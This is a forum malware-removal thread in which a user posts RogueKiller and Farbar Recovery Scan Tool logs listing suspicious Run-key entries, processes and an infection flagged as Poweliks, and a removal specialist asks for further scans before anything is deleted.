[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
[Suspicious.Path] ybaxk.exe -- C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe[-] -> Killed [TermThr]
 
¤¤¤ Registry : 42 ¤¤¤
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Okfylaigkiepqul : C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | {eaab0735-f4dd-2c20-e526-c77a5339bc54} : "C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Xohokebonien : "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Oxveroifbav : "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ezymkuzoawcy : C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Fuoxcoy : C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ozotovihulipa : "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe" [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Alldworks : C:\Users\RaRWolf\AppData\Local\Alldworks\msiexec.exe [-] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Abzworks : C:\Windows\SysWOW64\regsvr32.exe C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ecvtion : regsvr32.exe C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL [x] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Odheyqvau : C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [-] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Okfylaigkiepqul : C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Hewavy\olbuhi.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | {eaab0735-f4dd-2c20-e526-c77a5339bc54} : "C:\Users\RaRWolf\AppData\Local\Temp\18b98\AppData\Local\Microsoft\{eaab0735-f4dd-2c20-e526-c77a5339bc54}\{eaab0735-f4dd-2c20-e526-c77a5339bc54}.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Xohokebonien : "C:\Users\RaRWolf\AppData\Local\Temp\47e8\AppData\Roaming\Axutwu\osama.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Oxveroifbav : "C:\Users\RaRWolf\AppData\Roaming\Opfocyf\ebkawau.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ezymkuzoawcy : C:\Users\RaRWolf\AppData\Roaming\Adtuguka\hozuupw.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Fuoxcoy : C:\Users\RaRWolf\AppData\Roaming\Xyasocki\dugit.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ozotovihulipa : "C:\Users\RaRWolf\AppData\Roaming\Ifylqyte\aldinae.exe"  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Alldworks : C:\Users\RaRWolf\AppData\Local\Alldworks\msiexec.exe  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Abzworks : C:\Windows\SysWOW64\regsvr32.exe C:\Users\RaRWolf\AppData\Local\Alldworks\AdobeScCore.dll  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Ecvtion : regsvr32.exe C:\Users\RaRWolf\AppData\Local\Ecvtion\EP0NXFR1.DLL  -> ERROR [2]
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Run | Odheyqvau : C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [-] -> Deleted
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows NT\CurrentVersion\Windows | Load : C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com [x] -> Deleted
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows NT\CurrentVersion\Windows | Load : C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com  -> ERROR [2]
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\RzMaelstromVADStreamingService ("C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe") -> Not selected
[Hidden.From.SCM] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnlockerDriver5 -> Deleted
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\xhunter1 (\??\C:\Windows\xhunter1.sys) -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\RzMaelstromVADStreamingService ("C:\ProgramData\Razer\Synapse\Devices\Razer Surround\Driver\RzMaelstromVADStreamingService.exe") -> Not selected
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\xhunter1 (\??\C:\Windows\xhunter1.sys) -> Not selected
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Not selected
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Internet Explorer\Main | Start Page : www.google.com  -> Not selected
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Not selected
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Not selected
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {645FF040-5081-101B-9F08-00AA002F954E} : 1  -> Not selected
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-1557230296-4363482-4078292831-1002\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Deleted
 
¤¤¤ Tasks : 0 ¤¤¤
 
¤¤¤ Files : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] a9df0cc7b6bc49c83aac31658ba13be0
[BSP] fd850d89370382cc02cf66d2152e921f : Empty MBR Code
Partition table:
0 - [XXXXXX] UNKNOWN (0x0) [VISIBLE] Offset (sectors): 1 | Size: 2097152 MB
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )
 
 
============================================
RKreport_SCN_10232014_175125.log


#8 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:07:20 AM

Posted 23 October 2014 - 05:02 PM

You shouldn't pick up the Delete option unless advised, it is good to know where to shoot before pulling a trigger.

Please re run FRST, make sure that Addition option is checked and run Scan. Post the two logfiles generated.

Radek Naathim Pawelczyk

Malware Removal Specialist

 

staff.png


#9 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:01:20 AM

Posted 23 October 2014 - 05:38 PM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 22-10-2014
Ran by RaRWolf (administrator) on SHOOBLEDOOBLE on 23-10-2014 18:28:23
Running from C:\Users\RaRWolf\Downloads
Loaded Profile: RaRWolf (Available profiles: RaRWolf)
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
() C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(Wacom Technology, Corp.) C:\Windows\System32\Wacom_Tablet.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Logitech, Inc.) C:\Program Files\Logitech\SetPointP\SetPoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Flux Software LLC) C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
(Logitech, Inc.) C:\Program Files\Common Files\Logishrd\KHAL3\KHALMNPR.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(AIMP DevTeam) C:\Music\AIMP3\AIMP3.exe
() C:\Users\RaRWolf\Downloads\RogueKillerX64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Valve Corporation) C:\Program Files (x86)\Steam\Steam.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(The PHP Group) C:\Games\Running With Rifles\tools\php\php-win.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Valve Corporation) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
() C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2403104 2014-07-25] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3100440 2014-05-19] (Logitech, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6548112 2012-06-12] (Realtek Semiconductor)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [ASUS Ai Charger] => C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe [547984 2012-08-13] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [ASUS Easy Update] => C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe [195200 2012-05-24] (ASUSTeK Computer Inc.)
HKLM-x32\...\Run: [ASUSWebStorage] => C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe [3405696 2012-06-25] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [ASUSPRP] => C:\Program Files (x86)\ASUS\APRP\APRP.EXE [2984688 2012-09-14] (ASUSTek Computer Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-02-20] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe [296520 2014-08-01] (RealNetworks, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [585560 2014-06-23] (Razer Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [3802448 2014-09-04] (LogMeIn Inc.)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [1938624 2014-10-21] (Valve Corporation)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672640 2013-03-14] (Disc Soft Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Dxtory Update Checker 2.0] => C:\Program Files (x86)\ExKode\Dxtory2.0\UpdateChecker.exe [93696 2010-10-17] (Dxtory Software)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [MurGee.com Auto Clicker] => C:\Program Files (x86)\Auto Clicker\AutoClicker.exe [90440 2013-08-15] (MurGee.com)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [f.lux] => C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-23] (Flux Software LLC)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [uTorrent] => C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe [1385808 2014-10-16] (BitTorrent Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Razer Comms] => C:\Program Files (x86)\Razer\Comms\ChatApplet.exe [11233088 2014-08-01] (Razer Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [GoogleChromeAutoLaunch_0174F854A725FE2A1C6FD2A6E7F56180] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [854344 2014-10-09] (Google Inc.)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\Run: [Odheyqvau] => C:\Users\RaRWolf\AppData\Roaming\Liigli\ybaxk.exe [306301 2014-10-05] ()
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {052c3cd4-0787-11e4-bef9-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {0531270f-9781-11e3-bedd-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {10709a9d-09d0-11e3-bec3-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c2790a-f6d3-11e2-beb7-3085a9a720f7} - "V:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27936-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {16c27938-f6d3-11e2-beb7-3085a9a720f7} - "G:\LaunchBF.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {1fd923c8-bc33-11e3-bee5-3085a9a720f7} - "M:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {204b18f3-c014-11e3-bee6-3085a9a720f7} - "W:\Setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218680d2-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {218684f4-f681-11e3-bef3-3085a9a720f7} - "W:\AUTORUN.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224231d1-c503-11e2-be9f-3085a9a720f7} - "G:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224233b8-c503-11e2-be9f-3085a9a720f7} - "D:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239be-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {224239c6-c503-11e2-be9f-3085a9a720f7} - "V:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {27e8eeda-466e-11e4-bf02-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2656c-2f40-11e4-bf02-3085a9a720f7} - "W:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265cd-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db265d3-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {2db2668f-2f40-11e4-bf02-3085a9a720f7} - "W:\PLAY.EXE" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5225a7b0-262b-11e3-beca-3085a9a720f7} - "G:\autorun.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {5fb8944e-6f5a-11e3-bed8-3085a9a720f7} - "W:\LaunchEAWG.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382182-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {61382315-c8f3-11e3-bee9-3085a9a720f7} - "W:\setup.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {669ae025-c999-11e2-be9f-3085a9a720f7} - "V:\LaunchBFII.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca72ec-0943-11e3-bec1-3085a9a720f7} - "W:\AutoRunMorrowind.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7318-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunTribunal.exe" 
HKU\S-1-5-21-1557230296-4363482-4078292831-1002\...\MountPoints2: {75ca7333-0943-11e3-bec1-3085a9a720f7} - "G:\AutoRunBloodmoon.exe" 
